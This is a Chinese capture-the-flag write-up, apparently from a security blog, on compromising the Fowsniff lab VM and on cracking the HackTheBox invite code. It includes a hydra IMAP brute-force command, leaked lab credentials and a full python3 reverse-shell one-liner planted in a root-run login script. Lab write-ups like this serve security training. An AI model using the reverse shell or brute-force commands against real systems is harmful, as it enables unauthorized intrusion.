渗透测试实战-Fowsniff靶机入侵+HTB(hackthebox)入坑

阅读量    64163 | 评论 13   稿费 300

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

 

前言

大家好,爱写靶机入侵文章的我又来了!本次靶机为Fowsniff,因为不是很难内容不多,但是有些情况肯定在真实的攻击环境中还是有可能碰到和利用的,但是为了小弟还是在文章后面小弟加入了国外的一个在线靶机入侵测试平台的基础入坑第一篇。

 

靶机安装/下载

Fowsniff靶机下载:https://pan.baidu.com/s/1dvCJijStPYkeGtoSaLyg7A

靶机IP: 172.16.24.55

攻击者ip:172.16.24.38

 

实战

Fowsniff靶机入侵

第一步老规矩探测ip:

(这里有小伙伴要问了,为什么我有些靶机探测不到ip呢?其实大家可以通过另外一种方法,如:直接用nmap探测网段的80端口、22端口,这样会发现有些如arp-scan等一些工具无法探测出靶机IP的问题)

下一步自然就是端口扫描了,小弟这里还是使用nmap神器完成:

通过扫描可以看到该靶机开放了4个端口,除了80、22端口,还有一个pop3和imap端口,如果有小伙伴看过小弟前面几篇文章的话,您肯定知道,pop3是什么东西干嘛用的。

下一步我们还是一样,查看80端口,看能不能突破,如图:

可以看到首页上还是比较干净的,那么我们还是继续使用目录猜解工具跑一下目录看看,这里您可以使用dirb啊、御剑啊等等,小弟这里使用 gobuster 来完成这个工作,

命令:gobuster -u http://172.16.24.55 -s 200,301,302 -w /Users/d3ckx1/Desktop/wordlists/directory-list-2.3-my.txt -t 35

(命令介绍:-u 是目标IP/域名;-s 是http返回值;-w 是目录字典 -t 是线程)

通过目录猜解可以看到没有出现可疑的目录,那么根据这些靶机的尿性,突破口肯定是在首页或者其他页面,我们把目光放在首页上

通过首页上的接受,说明网站被人搞了,@fowsniffcorp的信息肯定被攻击者泄漏放在互联网上了,这时候不用怀疑是时候表演表演真正的谷歌技术了,

1.打开谷歌

2.输入 @fowsniffcorp 回车

就出现了这个网站:https://pastebin.com/NrAqVeeX

在这个泄漏的信息里我们拿到一些账户和加密的密码

下一步我们需要把这些md5的密文解密并跟账户分开保存,方便后面的破解工作,批量md5密文解密小弟用了somd5的平台,地址:

https://www.somd5.com/batch.html

可以看到只有一个密文无法解密,但是不影响我们继续下一步工作,这个时候我们把目标放在imap服务上,我们先探测一下看看这个服务,小弟这里使用msf来,您也可以在前面探测的时候直接加上nmap的 script模块

可以看到这个服务是正常使用的,下一步我们就是使用刚刚获取到的账户密码破解试试,这里小弟还是继续使用hydra来完成,您也可以使用其他工具,命令如下:
hydra -L /Users/d3ckx1/Desktop/imap-user.txt -P /Users/d3ckx1/Desktop/mailcall-pass.txt imap://172.16.24.55

成功破解出密码:seina :scoobydoo2,

下一步我们试着登陆看看,到了这里有小伙伴就要问了,这个服务这么登陆呢?这里你可以使用命令行来登陆,也可以使用foxmail来登陆,小弟这里使用foxmail来登陆,配置如下:

1.设置-新建

2.接收服务器类型-选择“imap”

3.2个服务器都写你的靶机ip

配置好以后,收到了2个邮件,其中在一个邮件里收到了一个密码,如图:

密码为:S1ck3nBluff+secureshell

下面我们使用这个密码去登陆 “baksteen”账户,为什么是他呢?因为第二封邮件他回复了。。。。

成功登陆了,下一步就是提权了,老规矩我们在/tmp目录下上传2个提权脚本,如图:

这里说一下,可千万别忽略和小看提权脚本哦,你可能能在这里找到突破口。

在运行“linuxprivchecker.py”的时候可以看到靶机只安装了python3,

通过另外一个脚本,没发现什么突破口,

到了这里小弟被卡了一段时间,最后小弟因为下班回家,又重新登陆了一下这个ssh,看到登陆的banner引起了我的警觉… 这尼玛肯定又问题,使用我在用户目录下面查看,如图:

.viminfo文件

发现可以文件 /opt/cube/cube.sh

我们切换目录下查看一下,这个文件权限如何

下面就是修改这个文件,

我们在后面加上我们的反弹shell,

这里的shellcode为:python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“你的ip”,6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’

(注:这里可以通过前面已经知道该靶机只有安装python3,故前面是 python3.)

保存!然后我们在本机运行nc来监听接收6666端口流量

到了这里就比较重要了,这里需要另外开一个命令行,重新去登陆刚刚“baksteen”ssh账户,如图:

在这里输入刚刚邮箱里的ssh密码后,我们就马上得到了一个root_shell

最后拿flag

本靶机完!!

HTB(hackthebox)入坑

Hack the box 是一个在线平台,允许您测试渗透测试技能,并与其他具有相似兴趣的成员交换想法和方法。它包含了一些不断更新的挑战。他们中的一些人模拟真实世界场景,其中一些人倾向于CTF风格的挑战。

作为个人,您可以完成一个简单的挑战来证明您的技能,然后创建一个帐户,允许您连接到我们的私有网络(HTB实验室),其中有几台机器等待您破解它们。通过黑客机器,你可以得到一些帮助你在名人堂前进的积分。

来吧,尝试破解邀请代码,以便成为会员!

(其实这个平台真的还不错,唯一的缺点就是我等肉身在墙内的人链接巨慢巨慢。。。。这里官方翻译的内容意思就是:想玩我吗?想玩我先破解出邀请码再来说吧,碧池!)

下面我们开始htb第一站 破解邀请码

地址:https://www.hackthebox.eu/invite

这里小伙伴们是不是就直接抄起burp来一顿操作?哈哈 如果是那样,那您就一个戒掉这个坏习惯,这话说的,估计会被各位大佬怼的我妈都不认识。。。。哈哈哈哈

其实该平台前端是用nodejs写的,如果您看过小弟前面的文章,就知道怎么搞nodejs了,没错,突破口在js文件上,我们右击查看源码

可以看到调用了2个js文件,我们美化一下这2个js文件,方便我们阅读代码

在上图中我们看到一个关键字 makelove…. 呸 是 makeInviteCode

下一步我们谷歌浏览器,在这个页面-右击-检查-console

一个骷髅头,没错,就是这么酷炫。

然后再下面输入 makeInviteCode() 回车

我们使用rot13来解密,解密地址:http://www.rot13.de/index.php

下一步根据提示 使用 post 请求,如图:

得到base64 code:TlZaWFAtTUFYQkUtSVVIR0QtQkVKRlEtR09MU0Y=

解密:NVZXP-MAXBE-IUHGD-BEJFQ-GOLSF

能成功注册

注1: 这里的验证码每次都不一样,小伙伴们需要自己操作一遍获得code。

注2:小伙伴们在注册这里可能会出现无法注册,是因为这里调用了谷歌的验证码,防止机器注册,所以注册时需要fan墙。

注3: 登陆该平台时,也需要先fan墙再连接官方提供的openvpn文件,否则会无法登陆实验环境,小伙伴们有钱的可以买个vip,靶机连接速度会快很多很多。

 

结语

通过这篇文章,可以发现有很多场景再平时正常入侵/渗透中还是可以碰到的,如前面第一篇靶机测试中,针对该目标的google的信息搜集工作,在提权时,出现的一个大大的banner,我相信正式环境中也是有的,小伙伴们以后也可以通过查看这个文件是否有权限来写入shellcode来完成提权,在第二篇文章中,可以查看js文件,不一定会有收获哦!

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多